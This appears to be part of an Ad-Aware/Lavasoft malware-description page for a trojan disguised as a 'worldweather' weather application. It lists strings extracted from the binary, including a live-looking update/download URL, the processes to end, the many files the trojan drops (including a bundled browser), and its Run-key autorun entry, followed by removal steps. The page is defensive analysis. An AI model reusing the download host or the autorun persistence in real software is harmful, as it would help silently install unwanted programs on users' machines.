    Windows XP Professional
    Windows XP Home
    Windows XP
    Windows Server 2003 Enterprise
    Windows Server 2003 Data center
    Windows Server 2003 Web Edition
    Windows Server 2003 Standard
    Windows Server 2003
    Windows Vista
    Windows Server 2008
    Microsoft Windows 7
    Windows Server 2008 R2
    Microsoft Windows 8
    GetwindowsVersion>
    world.cn
    5.00.5002
    worldweather.exe
    
worldWeatherUpdate.5002.exe_3076:
    

    

    .text
    `.data
    .rsrc
    MSVBVM60.DLL
    %Z%FG2F1
    webUpdateTS
    SHDocVwCtl.WebBrowser
    VB5!6&vb6chs.dll
    shdocvw.dll
    WebBrowser
    %Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
    kl%Program Files%\Microsoft Visual Studio\VB98\vbc04574.oca
    shell32.dll
    kernel32.dll
    mfc5002.dll
    VBA6.DLL
    sUrl
    MsgID
    MsgHnd
    http:///
    updateContext\update.html
    -----------------------Form_Load>cmdstr=[
    -----------------------Form_Load>ErrCmdstr>unload
    worldweather.exe
    form_load>insHighVersion>cmd=
    worldWeatherUpdate.5002.exe
    form_load>closeLastUpdate>ExecUpdateHighVer>
    Cfg5002.ini
    WeatherContext\WeatherContext.db
    http://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/
    updateContext\HighVerContext.db
    LoadUpdateData>CMD_UPDATE[
    updateContext\un_update.html
    updatehighVerInfo.xml
    HighVerContext.db
    WeatherContext.xml
    WeatherContext.db
    AQIContext.xml
    AQIContext.db
    PM25Context.xml
    PM25Context.db
    PM10Context.xml
    PM10Context.db
    updateContext.xml
    updateContext.db
    updateContext\updateRecord.db
    worldWeatherUpdateTmp.5002.exe
    IfExistsDestfile>UpdateExe>
    uninst.exe
    SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
    debug_update.log
    .wServicePackMinor:
    AQI.5002.exe
    PM25.5002.exe
    iePm25.exe
    PM10.5002.exe
    worldWeatherRealTime5002.exe
    ifLoadUpdateDataSuccess>MsgID>
    jxqxzmkupdatesj>needReloadNewsExe>
    jxqxzmkupdatesj>needReloadServerExe>
    .wProductType:
    PM10Context\PM10Context.db
    cnzz.html
    AQIContext\AQIContext.db
    PM25Context\PM25Context.db
    updateContext\updateContext.db
    ie.exe
    loadNotExistManagerData>NeedUpateIcoWhenExeLnkType>AddItem>
    .wSuiteMask:
    HookMsg>
    .wServicePackMajor:
    Microsoft Windows NT 4.0
    Microsoft Windows 95
    Microsoft Windows 98
    Microsoft Windows Me
    Windows 2000 Data center
    Windows 2000 Advanced
    Windows 2000
    Windows XP Professional
    Windows XP Home
    Windows XP
    Windows Server 2003 Enterprise
    Windows Server 2003 Data center
    Windows Server 2003 Web Edition
    Windows Server 2003 Standard
    Windows Server 2003
    Windows Vista
    Windows Server 2008
    Microsoft Windows 7
    Windows Server 2008 R2
    Microsoft Windows 8
    GetwindowsVersion>
    world.cn
    5.00.5002
    

    


    
Remove it with Ad-Aware
    

    

      

    1. Click (here) to download and install Ad-Aware Free Antivirus.
      2. 

    2. Update the definition files.
      3. 

    3. Run a full scan of your computer.
      4. 

    


    
Manual removal*
    

    

      

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):
      

      worldweather.exe:2288
      worldWeatherUpdate.5002.exe:3076
      365weatherIns_61.exe:456
      greendou.exe:2332
      PM10.5002.exe:2384
      worldWeatherRealTime5002.exe:1344
      mscorsvw.exe:424
      

      2. 

    2. Delete the original Trojan file.
      3. 

    3. Delete or disinfect the following files created/modified by the Trojan:
      

      %Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (288 bytes)
      %Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (216 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
      %Program Files%\worldweather\5.0.0.5002\weatherData.tmp (354 bytes)
      %Documents and Settings%\%current user%\Cookies\WXPOEL80.txt (73 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\PM10Context[1].xml (835 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\AQIContext[1].xml (365 bytes)
      %Documents and Settings%\All Users\Application Data\worldweather\AQIContext\AQIContext.db.!mv (365 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\PM25Context[1].xml (624 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WeatherContext[1].xml (509 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\366[1].ico (16369 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\367.ico.!mv (1177 bytes)
      %Documents and Settings%\All Users\Application Data\worldweather\PM25Context\PM25Context.db.!mv (624 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\366.ico.!mv (16369 bytes)
      %Documents and Settings%\All Users\Application Data\worldweather\PM10Context\PM10Context.db.!mv (835 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\369[1].ico (16369 bytes)
      %Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db.!mv (509 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\369.ico.!mv (16369 bytes)
      %Documents and Settings%\%current user%\Cookies\JB38A659.txt (102 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\367[1].ico (1177 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_min.jpg (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\1.jpg (1552 bytes)
      %Program Files%\worldweather\5.0.0.5002\PM10.5002.exe (7192 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\loading.gif (8 bytes)
      %Program Files%\worldweather\5.0.0.5002\weather.db (6584 bytes)
      %Program Files%\worldweather\5.0.0.5002\uninst.exe (2251 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\un_update.html (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_next.bmp (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\bg.bmp (18424 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_move.jpg (1 bytes)
      %Program Files%\worldweather\5.0.0.5002\areacode.db (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\2.jpg (1552 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\update.html (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\checkbox2.bmp (2 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\future\n99.png (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\checkbox1.bmp (2 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\future\tips.ico (1856 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_setting.jpg (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\i.gif (170 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\err.png (784 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\updateRecord.db (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\loading1.bmp (696 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\min.png (440 bytes)
      %Program Files%\worldweather\5.0.0.5002\sqliteApi.dll (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsu4.tmp (80589 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\inetc.dll (784 bytes)
      %Program Files%\worldweather\5.0.0.5002\sqlite3.dll (20416 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\SkinBtn.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_complete.bmp (2392 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_max.jpg (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe (4992 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\bg_small.png (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\KillProcDLL.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\tongji.html (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\nsWindows.dll (10 bytes)
      %Documents and Settings%\All Users\Start Menu\Programs\worldweather\´óÖÚÌìÆøÔ¤±¨Ð¶ÔØ.lnk (911 bytes)
      %Program Files%\worldweather\5.0.0.5002\worldweather.exe (19096 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\loading.png (3 bytes)
      %Documents and Settings%\All Users\Start Menu\Programs\worldweather\´óÖÚÌìÆøÔ¤±¨.lnk (943 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\large\n99.png (784 bytes)
      %Program Files%\worldweather\5.0.0.5002\AQI.5002.exe (7192 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_close.bmp (1 bytes)
      %Program Files%\worldweather\5.0.0.5002\WeatherContext\WeatherContext.db (352 bytes)
      %Program Files%\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe (11344 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\tongji_61[1].htm (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\ToggleImages.html (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\System.dll (11 bytes)
      %Program Files%\worldweather\5.0.0.5002\PM25.5002.exe (11344 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\3.jpg (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\nsDialogs.dll (9 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\md5dll.dll (8 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\bg_large.png (9 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\kz.png (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\close.png (873 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\skin.xml (6 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_close.jpg (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\topbar.png (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\mfc5002.dll (5520 bytes)
      %Documents and Settings%\All Users\Application Data\worldweather\updateContext\updateRecord.db (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\loading2.bmp (696 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1] (10094 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1].txt (14600 bytes)
      %Program Files%\greeou\profile\Defaults\config.ini (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
      %Program Files%\greeou\profile\Defaults\last.ini (1134 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ëѹ·¸ßËÙÉÏÍø.lnk (1 bytes)
      %Documents and Settings%\All Users\Application Data\367.ico (9 bytes)
      %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (848 bytes)
      %Program Files%\greeou\skin\Default\control\tab_hover.png (346 bytes)
      %Program Files%\greeou\skin\Default\control\tab_bg.png (314 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_new3.png (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\open.ini (3 bytes)
      %Program Files%\greeou\skin\Default\misc\16_ad_hunter.png (716 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\365weatherIns_61.exe (114375 bytes)
      %Program Files%\greeou\profile\Template\start\style.css (3 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_back3.png (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (14 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_favorites2.png (696 bytes)
      %Program Files%\greeou\skin\Default\control\MenuItem_Hover.png (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
      %Program Files%\greeou\skin\Default\misc\24_go.png (650 bytes)
      %Program Files%\greeou\skin\Default\shared\16_new.png (650 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_favorites.png (700 bytes)
      %Program Files%\greeou\profile\Defaults\CommandBars.ini (1 bytes)
      %Program Files%\greeou\skin\Default\mskin.ini (10 bytes)
      %Program Files%\greeou\GreenDou.exe (25123 bytes)
      %Program Files%\greeou\skin\Default\control\status_bar_bg.png (445 bytes)
      %Program Files%\greeou\skin\Default\control\combo_dropdown_hover.png (774 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_forward.png (947 bytes)
      %Program Files%\greeou\skin\Default\control\win_minimize.png (202 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_refresh.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\combo_dropdown.png (794 bytes)
      %Program Files%\greeou\profile\Template\start\images\logo.gif (3 bytes)
      %Program Files%\greeou\skin\Default\control\Button_Pressed.png (1 bytes)
      %Program Files%\greeou\profile\Template\start\index.html (832 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_home.png (1 bytes)
      %Program Files%\greeou\skin\Default\misc\16_website_info.png (1 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_new.png (879 bytes)
      %Program Files%\greeou\skin\Default\control\title_bg.png (655 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_home2.png (1 bytes)
      %Program Files%\greeou\profile\Template\start\images\header_logo.gif (2 bytes)
      %Program Files%\greeou\skin\Default\shared\16_edit.png (646 bytes)
      %Program Files%\greeou\skin\Default\control\tab_sidebar.png (321 bytes)
      %Program Files%\greeou\profile\SearchEngine\config.ini (226 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_new2.png (801 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_page_zoom2.png (724 bytes)
      %Program Files%\greeou\profile\Template\start\images\dian.gif (376 bytes)
      %Program Files%\greeou\skin\Default\control\win_close.png (362 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_refresh2.png (1 bytes)
      %Program Files%\greeou\profile\Template\start\images\header_bg.gif (83 bytes)
      %Program Files%\greeou\skin\Default\control\tab_active.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\mainframe.png (288 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_back2.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\tab_inactive.png (281 bytes)
      %Program Files%\greeou\skin\Default\control\sidebar_tab_inactive.png (259 bytes)
      %Program Files%\greeou\skin\Default\misc\16_folder_open.png (614 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_search.png (871 bytes)
      %Program Files%\greeou\skin\Default\control\combosearch_dropdown.png (794 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_stop2.png (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (3004 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\xID.dll (3 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_search2.png (969 bytes)
      %Program Files%\greeou\skin\Default\control\win_maximum.png (275 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_new.png (637 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_page_zoom.png (733 bytes)
      %Program Files%\greeou\skin\Default\control\tab_sidebar_hover.png (322 bytes)
      %Program Files%\greeou\skin\Default\control\Button_Hover.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\progress.png (708 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_back.png (953 bytes)
      %Program Files%\greeou\skin\Default\control\combo.png (260 bytes)
      %Program Files%\greeou\profile\SearchEngine\google.ico (1 bytes)
      %Program Files%\greeou\skin\Default\control\tab_new.png (350 bytes)
      %Program Files%\greeou\skin\Default\control\combosearch_dropdown_hover.png (774 bytes)
      %Program Files%\greeou\profile\Template\start\left.html (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\setup_3128.exe (125242 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\nsRandom.dll (935 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_forward2.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\skin_selector.png (283 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\Md5dll.dll (8 bytes)
      %Program Files%\greeou\skin\Default\control\win_restore.png (302 bytes)
      %Program Files%\greeou\skin\Default\control\Button_Checked.png (976 bytes)
      %Program Files%\greeou\skin\Default\misc\16_page.png (519 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\processwork.dll (6140 bytes)
      %Program Files%\greeou\skin\Default\control\tab_close.png (259 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_history2.png (994 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_undo2.png (840 bytes)
      %Program Files%\greeou\skin\Default\control\tab_new_hover.png (346 bytes)
      %Program Files%\greeou\profile\SearchEngine\taobao.ico (1 bytes)
      %Program Files%\greeou\skin\Default\control\sidebar_tab_active.png (957 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_new2.png (1 bytes)
      %Program Files%\greeou\skin\Default\misc\16_folder_closed.png (587 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_stop.png (1 bytes)
      %Program Files%\greeou\skin\Default\misc\16_open_in_bg.png (507 bytes)
      %Documents and Settings%\%current user%\Start Menu\Programs\Â̶¹ä¯ÀÀÆ÷\Â̶¹ä¯ÀÀÆ÷.lnk (678 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\Inetc.dll (20 bytes)
      %Documents and Settings%\%current user%\Desktop\Â̶¹ä¯ÀÀÆ÷.lnk (666 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_history.png (847 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_undo.png (748 bytes)
      %Program Files%\greeou\profile\SearchEngine\baidu.ico (2 bytes)
      %Program Files%\greeou\skin\Default\misc\24_go2.png (648 bytes)
      %Program Files%\greeou\skin\Default\control\combo_hover.png (261 bytes)
      %Program Files%\greeou\skin\Default\control\tab_close_hover.png (2 bytes)
      %Program Files%\greeou\profile\Defaults\searchkeys.ini (14 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_forward3.png (1 bytes)
      %Program Files%\greeou\ico\taobao.ico (2104 bytes)
      %Program Files%\greeou\skin\Default\misc\16_open_in_new.png (548 bytes)
      %Program Files%\greeou\profile\Template\start\images\logo2.gif (596 bytes)
      

      4. 

    4. Delete the following value(s) in the autorun key (How to Work with System Registry):
      

      [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "worldweather5002" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe /autorun"
      

      5. 

    5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
      6. 

    6. Reboot the computer.
      7. 

    

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.
    

    

    

    

    


    
 
 




 
    No votes yet
    

    

    




    

    
				

    
							
    

			

				
					  
							

		
    
		
    

					
							

	
    
	
	        
    

	

        
      
     

      
      

      
    
     

    
  
     

		

    
		
    
		
			
    
			
    
				
    
					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				
    
				
    
					© 2026 Lavasoft. All rights reserved.
    
					Terms Of Use |   Privacy Policy
					

    
								
    
			
    

		
    
		

    
	
    
	
	
    
	
    
		x
		
    Our best antivirus yet!
    
		
    Fresh new look. Faster scanning. Better protection.
    
		
    
			
    Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!
    
			
    For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!
    
			
			Download adaware antivirus 12
		
    
		No thanks, continue to lavasoft.com
	
    
	
    
		
    
			close x
			
    Discover the new adaware antivirus 12
    
			
    Our best antivirus yet
    
			Download Now